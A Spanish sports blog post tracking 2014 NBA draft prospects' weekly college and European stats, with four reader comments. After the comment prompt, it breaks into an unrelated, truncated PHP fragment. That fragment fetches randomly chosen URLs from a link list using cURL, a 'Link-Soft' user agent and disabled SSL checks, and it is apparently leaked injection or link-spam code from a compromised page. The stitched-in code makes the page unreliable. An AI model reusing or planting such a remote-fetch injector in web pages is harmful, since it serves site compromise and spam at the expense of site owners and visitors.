Seguimiento del Draft 2014: Semana del 25 al 31 de Enero

01 de February de 2014 por Viva_Dirk

El sábado comenzó con la victoria de Duke liderado por Rodney Hood con 18-9 y Jabari Parker con 14-14,  aunque ambos con malas series de tiro. Syracuse se mantenía imbatida gracias a su victoria frente los Hurricanes. Los 1era ronda Jerami Grant con 16-8 y Tyler Ennis con 14-5-4 tuvieron buena culpa de ello. Kentucky ganó de manera muy sencilla a Georgia con con 14-9-3 de Julius Randle, mientras que Willie Cauley-Stein consiguió 8 puntos, 6 tapones y 6 robos. En cambio, presenciamos un mal partido de Marcus Smart que se quedó en 4 puntos en la victoria de Oklahoma St. Fue LeBryan Nash el que lideró a equipo con 29-9. Sam Dekker dejó un correcto 15-7 en la victoria de Wisconsin. En cambio, Pittsburgh se llevó la victoria gracias a una tremenda actuación de Lamar Patterson que con actuaciones semejantes (28-7-7) bien podría mejorar posiciones en este draft. Ahora aparece como una segunda ronda baja. El partido de la jornada enfrentraba a Wolverines y Spartans, la victoria fue para los primeros con un buen Nick Stauskas, que acabó con 19 puntos y 4 asistencias, y que estuvo bien acompañado por el base de primer año Derrick Walton que acabó con un 19-6-4. Esta vez no sirvió de nada otro gran partido de Gary Harris que terminó con 27-5, 3 robos y una gran serie de tiro. El de Michigan State pelea por ser elegido en el TOP-10. Los Kansas Jayhawks no tuvieron ningún problema para vencer a TCU con un gran partido de Andrew Wiggins que acabó con 27-5-5, mientras que Joel Embiid en 19 minutos hizo 14-6, 3 tapones y 5 faltas, y Wayne Selden se quedó en 12-3-4. Finalmente, Lafayette cayó a pesars del buen partido del base Elfrid Payton, proyectado en segunda ronda. Acabó con un 16-5-6 y 3 robos. 

El domingo, Arizona consiguió el record de victorias consecutivas de la universidad tras hacerse con la número 20. Fue Nick Johnson con 22 puntos el que lideró al equipo en un partido en el que Aaron Gordon acabó con 10 puntos y 12 rebotes pero jugando realmente mal. No me extraña que vayan de record porque los Wildcats tienen un equipazo. En la victoria de Memphis vimos otro buen partido de Shaq Goodwin, con un 13-10 y aportando en el resto de facetas. En cambio, partido un tanto gris de Noah Vonleh en la victoria de los Hoosiers. Acabó con 4 puntos, 14 rebotes y solo 6 tiros intentados.

El lunes, Duke ganó con otro buen partido de su pareja: Jabari Parker acabó con 21-11 con un 7 de 19 en tiros y Rodney Hood con 13-3-4. Marcus Smart hizo un 22-4-3 pero con un 6 de 18 en tiros en la derrota de su equipo frente a Oklahoma, en un partido en el que Ryan Spangler fue el mejor con 15-17.

El martes los Spartans ganaron a Iowa en la prórroga a pesar del flojo partido de Gary Harris: 9-6-4 con un 3 de 9 en tiros. Mejor estuvo su compañero Keith Appling que terminó con 16-3-4 y 3 robos. Devyn Marble, con 21 puntos y 5 rebotes, se fue para casa sin recompensa. En cambio, derrota de Kentucky en un mal partido de Julius Randle que acabó con 6 puntos, 5 rebotes y 3 de 11 en tiros. En su lugar tiró del carro James Young con 23 puntos y 7 rebotes porque Willie Cauley-Stein no se presentó practicamente ni a jugar. El bombazo de la noche llegó con la exhibición de Doug McDermott que se fue hasta los 39 puntos (de los 63 de su equipo) y 6 rebotes con una genial serie de tiro. Crack con todas las letras.

Andrew WigginsEl miércoles nos dejó una victoria de Kansas con 29 puntos (máximo de la temporada) y 7 rebotes de Andrew Wiggins, que ha cuajado una buena semana. Joel Embiid hizo un 14-11 mientras que el partido de Wayne Selden fue discreto. Arizona sigue invicta pero no gracias a Aaron Gordon que sigue cuajando actuaciones decepcionantes. Los Wilcats ganaron a Stanford a pesar de sus 5 puntos y 9 rebotes con un 2 de 10 en tiros. Nick Johnson sí ejerció de líder con un 16-5-4. Buen partido de Tyler Ennis (que sube como la espuma en los mocks) en la victoria de Syracuse. Terminó con 18-5-4 mientras que su compañero Jerami Grant hizo un 10-12. En cambio, Wisconsin sufrió una inesperada derrota en casa en un partido en el qeu Sam Dekker se quedó en 11 puntos y 7 rebotes con un 2 de 9 en tiros. El pequeño base Jahii Carson (segunda ronda alta) lideró a Arizona St a la victoria en la prórroga con 29 puntos y 7 asistencia. 11 de esos 29 puntos llegaron en el tiempo extra.

El jueves no fue un buen día para Noah Vonleh que con 7 puntos y 5 pérdidas contribuyó a la derrota de los Hoosiers. Otro que tuvo un partido para olvidar fue Zach LaVine que anotó solo 2 puntos en 25 minutos. Su compañero Kyle “Lo amas o lo odias” Anderson anotó 6 puntos, repartió 10 asistencias y perdió 9 balones. A pesar de todo, UCLA se llevó la victoria. Michigan ganó con 16 puntos de Nik Stauskas, y Connecticut hizo lo propio con Shabazz Napier como líder con un 19-7. Luiville cayó frente Cincinnati a pesar de los 18 puntos de Montrezl Harris y los 16 de Russ Smith.Y no podemos dejar pasar el partido de 38 puntos de Tyler Hawspese a que no le veamos en mock alguno. Jugaron los Gators y sigue sin debutar Chris Walker, uno de los grandes nombres freshman de este año.

Ayer viernes ya no hubo ningún partido con presencia de jugadores destacados por lo que toca fijarse en el apartado internacional. En Croacia asistimos a un derby entre la Cibona de Dario Saric y el Cedevita de Jusuf Nurkic que se llevó el primero. El alero consiguió 13 puntos y 10 rebotes, por los 8 puntos y 10 rebotes del center. Por su parte, el pivot Clint Capela apenas jugó en su partido. Bogdan Bogdanovic también jugó poco: en 15 minutos anotó 8 puntos en la derrota del Partizan.Vasilije Micic sí jugó un buen partido. Con 18 puntos, 7 asistencias y 3 robos fue el mejor de los suyos. Walter Tavares, con 10 puntos, 13 rebotes y 5 tapones se fue hasta los 26 de valoración. En cambio, Alessandro Gentile tuvo un partido discreto con 8 puntos, 4 rebotes y 3 asistencias.

No os perdías los partidazos de hoy en la NCAA. Arizona, Duke, Syracuse, Kansas, Michigan State, Oklahoma State… O lo que os lo mismo: Parker, Embiid, Wiggins, Randle, Hood, Smart, Ennis, Gordon, Harris. ¡Canela fina!

Comenta

4 comentarios a esta entrada

  1. Dantley dice:
    #1

    Completísimo. Me ha gustado lo de lo amas o lo odias de Kyle Anderson. Estoy más en el lado del odio, pero no lo tengo del todo claro.

    Wiggins va afinándose y Embiid confirmándose. Randle cada vez da más dudas.

    Y si soy GM en la NBA, McDermott no me pasa del pick 6 por mucho que no sea carne de NBA.

      Citar

  2. Denise dice:
    #2

    Dantley:
    Completísimo. Me ha gustado lo de lo amas o lo odias de Kyle Anderson. Estoy más en el lado del odio, pero no lo tengo del todo claro.

    Wiggins va afinándose y Embiid confirmándose. Randle cada vez da más dudas.

    Y si soy GM en la NBA, McDermott no me pasa del pick 6 por mucho que no sea carne de NBA.

    Yo lo que he visto de Randle me gusta y mucho. Un 4 fuerte y poderoso, sin mucho tiro exterior pero con buenos movimientos a 3-4 metros del aro.
    Vonleh me encanta y lo veo como el típico 4 que se puede tirar toda una decada haciendo dobles-dobles con la gorra. Debería ser un Top 8 facilmente,
    Y McDermott es una puta metralleta que me recuerda a uno de mis jugadores favoritos de todos los tiempos: Mike Miller. Yo no lo pondría tanto como un Top 6 pero no debería bajar del 10.

    Que ganas de que llegue el Draft y espero que todos se presenten.

      Citar

  3. Denise dice:
    #3

    Por cierto, a quien le interese, en el canal de Youtube de Draftexpress ya están empezando a subir videos de scouting de estos chicos. Después una vez que termina la NCAA y se acerca el Draft, actualizan los videos en función de su campaña en la universidad, pero mientras tanto, está bien verlos.

    Ya están los de Embiid, Smart, Jabari Parker, McDermott, Exum, Randle ó el hermano de Antetokoumpo entre otros.

    http://www.youtube.com/user/DraftExpress/videos

      Citar

  4. Vader dice:
    #4

    Denise:
    Por cierto, a quien le interese, en el canal de Youtube de Draftexpress ya están empezando a subir videos de scouting de estos chicos. Después una vez que termina la NCAA y se acerca el Draft, actualizan los videos en función de su campaña en la universidad, pero mientras tanto, está bien verlos.

    Ya están los de Embiid, Smart, Jabari Parker, McDermott, Exum, Randle ó el hermano de Antetokoumpo entre otros.

    http://www.youtube.com/user/DraftExpress/videos

    Gran aporte, muchas gracias Denise!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>